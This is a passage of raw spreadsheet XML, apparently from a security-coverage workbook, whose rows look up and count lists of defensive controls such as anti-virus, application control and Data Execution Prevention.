        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="F15" s="50"/>
      <c r="G15" s="19"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A16" s="16" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="45" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:H)</f>
        <v>File monitoring,Host intrusion prevention systems,Application control,Signature-based detection,System access controls,Application control by file name or path,Anti-virus</v>
      </c>
      <c r="C16" s="17">
        <v>0</v>
      </c>
      <c r="D16" s="45">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="E16" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F16" s="50"/>
      <c r="G16" s="19"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="16" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="45" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C17" s="17">
        <v>0</v>
      </c>
      <c r="D17" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E17" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F17" s="50"/>
      <c r="G17" s="19"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="16" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="45" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C18" s="17">
        <v>0</v>
      </c>
      <c r="D18" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E18" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F18" s="50"/>
      <c r="G18" s="19"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="16" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="45" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C19" s="17">
        <v>0</v>
      </c>
      <c r="D19" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E19" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F19" s="50"/>
      <c r="G19" s="19"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="16" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="45" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C20" s="17">
        <v>0</v>
      </c>
      <c r="D20" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E20" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F20" s="50"/>
      <c r="G20" s="19"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="16" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="45" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C21" s="17">
        <v>0</v>
      </c>
      <c r="D21" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E21" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F21" s="50"/>
      <c r="G21" s="19"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="16" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="45" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C22" s="17">
        <v>0</v>
      </c>
      <c r="D22" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E22" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="50"/>
      <c r="G22" s="19"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="16" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="45" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C23" s="17">
        <v>0</v>
      </c>
      <c r="D23" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E23" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F23" s="50"/>
      <c r="G23" s="19"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="16" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="45" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C24" s="17">
        <v>0</v>
      </c>
      <c r="D24" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E24" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F24" s="50"/>
      <c r="G24" s="19"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="16" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="45" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C25" s="17">
        <v>0</v>
      </c>
      <c r="D25" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E25" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F25" s="50"/>
      <c r="G25" s="19"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="16" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="45" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C26" s="17">
        <v>0</v>
      </c>
      <c r="D26" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E26" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F26" s="50"/>
      <c r="G26" s="19"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="16" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="45" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C27" s="17">
        <v>0</v>
      </c>
      <c r="D27" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E27" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F27" s="50"/>
      <c r="G27" s="19"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="16" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="45" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:H)</f>
        <v>Host forensic analysis,Signature-based detection,Host intrusion prevention systems,Application control,Log analysis,Application control by file name or path</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>402</v>
      </c>
      <c r="D28" s="45">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E28" s="45">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="F28" s="50"/>
      <c r="G28" s="19"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="16" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="45" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Log analysis,Signature-based detection</v>
      </c>
      <c r="C29" s="17">
        <v>0</v>
      </c>
      <c r="D29" s="45">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E29" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F29" s="50"/>
      <c r="G29" s="19"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="16" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="45" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C30" s="17">
        <v>0</v>
      </c>
      <c r="D30" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E30" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F30" s="50"/>
      <c r="G30" s="19"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="16" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="45" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C31" s="17">
        <v>0</v>
      </c>
      <c r="D31" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E31" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F31" s="50"/>
      <c r="G31" s="19"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="16" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="45" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C32" s="17">
        <v>0</v>
      </c>
      <c r="D32" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E32" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F32" s="50"/>
      <c r="G32" s="19"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="16" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="45" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C33" s="17">
        <v>0</v>
      </c>
      <c r="D33" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E33" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F33" s="50"/>
      <c r="G33" s="19"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="16" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="45" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C34" s="17">
        <v>0</v>
      </c>
      <c r="D34" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E34" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F34" s="50"/>
      <c r="G34" s="19"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="16" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="45" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C35" s="17">
        <v>0</v>
      </c>
      <c r="D35" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E35" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F35" s="50"/>
      <c r="G35" s="19"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="16" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="45" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C36" s="17">
        <v>0</v>
      </c>
      <c r="D36" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E36" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F36" s="50"/>
      <c r="G36" s="19"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="16" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="45" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:H)</f>
        <v>Application control by file name or path</v>
      </c>
      <c r="C37" s="17">
        <v>100</v>
      </c>
      <c r="D37" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E37" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F37" s="50"/>
      <c r="G37" s="19"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="16" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="45" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C38" s="17">
        <v>0</v>
      </c>
      <c r="D38" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E38" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F38" s="50"/>
      <c r="G38" s="19"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="16" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="45" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C39" s="17">
        <v>100</v>
      </c>
      <c r="D39" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E39" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F39" s="50"/>
      <c r="G39" s="19"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="16" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="45" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C40" s="17">
        <v>0</v>
      </c>
      <c r="D40" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E40" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F40" s="50"/>
      <c r="G40" s="19"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="16" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="45" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C41" s="17">
        <v>0</v>
      </c>
      <c r="D41" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E41" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F41" s="50"/>
      <c r="G41" s="19"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="16" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="45" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C42" s="17">
        <v>0</v>
      </c>
      <c r="D42" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E42" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F42" s="50"/>
      <c r="G42" s="19"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="16" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="45" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C43" s="17">
        <v>0</v>
      </c>
      <c r="D43" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E43" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F43" s="50"/>
      <c r="G43" s="19"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="16" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="45" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C44" s="17">
        <v>0</v>
      </c>
      <c r="D44" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E44" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F44" s="50"/>
      <c r="G44" s="19"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="16" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="45" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C45" s="17">
        <v>0</v>
      </c>
      <c r="D45" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E45" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F45" s="50"/>
      <c r="G45" s="19"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="16" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="45" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C46" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D46" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E46" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F46" s="50"/>
      <c r="G46" s="19"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="16" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="45" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C47" s="17">
        <v>0</v>
      </c>
      <c r="D47" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E47" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F47" s="50"/>
      <c r="G47" s="19"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="16" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="45" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C48" s="17">
        <v>0</v>
      </c>
      <c r="D48" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E48" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F48" s="50"/>
      <c r="G48" s="19"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="16" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="45" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C49" s="17">
        <v>0</v>
      </c>
      <c r="D49" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E49" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F49" s="50"/>
      <c r="G49" s="19"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="16" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="45" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C50" s="17">
        <v>0</v>
      </c>
      <c r="D50" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E50" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F50" s="50"/>
      <c r="G50" s="19"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="16" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="45" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C51" s="17">
        <v>0</v>
      </c>
      <c r="D51" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E51" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F51" s="50"/>
      <c r="G51" s="19"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="16" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="45" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C52" s="17">
        <v>0</v>
      </c>
      <c r="D52" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E52" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F52" s="50"/>
      <c r="G52" s="19"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="16" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="45" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C53" s="17">
        <v>0</v>
      </c>
      <c r="D53" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E53" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F53" s="50"/>
      <c r="G53" s="19"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="16" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="45" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C54" s="17">
        <v>0</v>
      </c>
      <c r="D54" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E54" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F54" s="50"/>
      <c r="G54" s="19"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="16" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="45" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C55" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D55" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E55" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="50"/>
      <c r="G55" s="19"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="16" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="45" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:H)</f>
        <v>Application control,Anti-virus</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D56" s="45">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E56" s="45">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F56" s="50"/>
      <c r="G56" s="19"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="16" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="45" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C57" s="17">
        <v>0</v>
      </c>
      <c r="D57" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E57" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F57" s="50"/>
      <c r="G57" s="19"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="16" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="45" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C58" s="17">
        <v>0</v>
      </c>
      <c r="D58" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E58" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F58" s="50"/>
      <c r="G58" s="19"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="16" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="45" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C59" s="17">
        <v>0</v>
      </c>
      <c r="D59" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E59" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F59" s="50"/>
      <c r="G59" s="19"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="16" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="45" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C60" s="17">
        <v>0</v>
      </c>
      <c r="D60" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E60" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F60" s="50"/>
      <c r="G60" s="19"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="16" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="45" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C61" s="17">
        <v>0</v>
      </c>
      <c r="D61" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E61" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F61" s="50"/>
      <c r="G61" s="19"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="16" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="45" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C62" s="17">
        <v>0</v>
      </c>
      <c r="D62" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E62" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F62" s="50"/>
      <c r="G62" s="19"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="16" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="45" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C63" s="17">
        <v>0</v>
      </c>
      <c r="D63" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="50"/>
      <c r="G63" s="19"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="16" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="45" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C64" s="17">
        <v>0</v>
      </c>
      <c r="D64" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E64" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F64" s="50"/>
      <c r="G64" s="19"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="16" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="45" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D65" s="45">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="50"/>
      <c r="G65" s="19"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="16" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="45" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C66" s="17">
        <v>0</v>
      </c>
      <c r="D66" s="45">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F66" s="50"/>
      <c r="G66" s="19"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="16" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="45" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D67" s="45">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E67" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F67" s="50"/>
      <c r="G67" s="19"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="16" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="45" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:H)</f>
        <v>Process whitelisting,Data Execution Prevention,Exploit Prevention</v>
      </c>
      <c r="C68" s="17">
        <v>0</v>
      </c>
      <c r="D68" s="45">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F68" s="50"/>
      <c r="G68" s="19"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="16" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="45" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C69" s="17">
        <v>0</v>
      </c>
      <c r="D69" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E69" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F69" s="50"/>
      <c r="G69" s="19"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="16" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="45" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C70" s="17">
        <v>0</v>
      </c>
      <c r="D70" s="45">
